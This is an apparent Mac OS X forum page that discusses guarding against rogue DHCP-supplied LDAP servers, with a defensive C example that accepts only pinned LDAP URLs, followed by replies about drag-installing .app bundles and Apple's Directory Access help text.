One possible solution would be to require TLS and SSL certs signed by a (manually-installed) CA cert.
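To make that trust decision concrete, here is an added example in C (not from the thread, not Apple's code). It parses the options field of a DHCP reply, pulls out option 95, the LDAP option code in the IANA DHCP options registry and the one "Use DHCP-supplied LDAP Server" consumes, and honours the URL only if it byte-for-byte matches one the administrator pinned in advance. The DHCPOFFER bytes and the pinned hostname ldap.corp.example are constructed for the example.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define DHCP_OPT_PAD      0
#define DHCP_OPT_MSGTYPE  53
#define DHCP_OPT_SERVERID 54
#define DHCP_OPT_LDAP     95   /* LDAP server URL (IANA option code 95) */
#define DHCP_OPT_END      255

enum ldap_verdict { LDAP_REJECTED = -1, LDAP_NONE = 0, LDAP_ALLOWED = 1 };

/* Append one option TLV to buf; returns the new write position. */
static size_t put_opt(unsigned char *buf, size_t pos, unsigned char code,
                      const void *val, size_t len)
{
    buf[pos++] = code;
    buf[pos++] = (unsigned char)len;
    memcpy(buf + pos, val, len);
    return pos + len;
}

/* Constructed DHCPOFFER options field (the bytes after the magic cookie)
 * advertising ldap_url; pass NULL to omit option 95. Returns its length. */
size_t build_sample_offer(unsigned char *buf, const char *ldap_url)
{
    const unsigned char offer = 2;                        /* DHCPOFFER */
    const unsigned char server_id[4] = {192, 0, 2, 1};    /* constructed */
    size_t pos = 0;
    pos = put_opt(buf, pos, DHCP_OPT_MSGTYPE, &offer, 1);
    pos = put_opt(buf, pos, DHCP_OPT_SERVERID, server_id, 4);
    if (ldap_url)
        pos = put_opt(buf, pos, DHCP_OPT_LDAP, ldap_url, strlen(ldap_url));
    buf[pos++] = DHCP_OPT_END;
    return pos;
}

/* Locate option `code`. Returns its length and sets *val, or -1 if absent or
 * if the TLV chain is malformed: a length byte that runs past the buffer is
 * attacker-controlled data and must not be trusted. */
int dhcp_find_option(const unsigned char *opts, size_t len, unsigned char code,
                     const unsigned char **val)
{
    size_t i = 0;
    while (i < len) {
        unsigned char c = opts[i];
        if (c == DHCP_OPT_END) return -1;
        if (c == DHCP_OPT_PAD) { i++; continue; }
        if (i + 1 >= len) return -1;            /* no room for the length byte */
        size_t l = opts[i + 1];
        if (i + 2 + l > len) return -1;         /* value overruns the buffer   */
        if (c == code) { *val = opts + i + 2; return (int)l; }
        i += 2 + l;
    }
    return -1;
}

/* Policy: a DHCP-supplied LDAP URL is honoured only if it exactly matches one
 * of the operator-pinned URLs. Anything else is treated as a rogue server. */
enum ldap_verdict check_dhcp_ldap(const unsigned char *opts, size_t len,
                                  const char *const *allow, size_t nallow)
{
    const unsigned char *v;
    int l = dhcp_find_option(opts, len, DHCP_OPT_LDAP, &v);
    if (l < 0) return LDAP_NONE;
    for (size_t k = 0; k < nallow; k++)
        if (strlen(allow[k]) == (size_t)l && memcmp(allow[k], v, (size_t)l) == 0)
            return LDAP_ALLOWED;
    return LDAP_REJECTED;
}

int main(void)
{
    const char *const pinned[] = { "ldap://ldap.corp.example/" };  /* assumed */
    const char *urls[] = { "ldap://ldap.corp.example/", "ldap://203.0.113.5/", NULL };
    unsigned char buf[256];
    for (size_t i = 0; i < 3; i++) {
        size_t n = build_sample_offer(buf, urls[i]);
        int v = check_dhcp_ldap(buf, n, pinned, 1);
        printf("%-28s -> %s\n", urls[i] ? urls[i] : "(no option 95)",
               v == LDAP_ALLOWED ? "allowed" : v == LDAP_REJECTED ? "REJECTED" : "none");
    }
    return 0;
}
```

Pinning the URL only answers "which server did DHCP name?"; it does not stop someone answering for that name on the local segment, so it belongs alongside the TLS-with-pinned-CA suggestion above rather than instead of it.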
What was your proposal?
* Anything excludes most major Windows-based OEMs. :D
I have to disagree with this particular statement. I attempted to install Photoshop by dragging the Photoshop.app just the other day and it complained copiously about missing/wrong-version stuff, and quit before it finished starting.
As for your general point, yes, at least 90% of the apps on my machine are one .app. If I decide I hate something, I can just trash it and be done (Useful for MSIE). I save a lot of time not going to Start > Control Panel > Add/Remove Programs 3x a day.
It seems only the truly huge apps like PS, Dreamweaver, MS Office, need installers. A lot of apps, the official AIM client (I know, I know--suck) being one example, can be installed by dragging the executable, even though they're distributed with an installer. I know this because I keep that client stored in a DMG whenever I'm not using it due to its buggy, slow nature.
About Directory Access
Directory Access determines which directory services a Mac OS X computer uses and how it connects to specific directory domains. Directory Access determines how the computer discovers network services. Directory Access also defines search policies for finding authentication and contacts information in specific directory domains.
For more information about directory services, network service discovery, and authentication and contacts search policies, click "Tell me more."
Get the advice of a network administrator before changing Directory Access settings. If your computer is at home, you shouldn't need to change settings in Directory Access unless you are setting up a home network with a server.
If you are a network administrator and want help changing settings in Directory Access, open Directory Access and choose Help > Directory Access Help.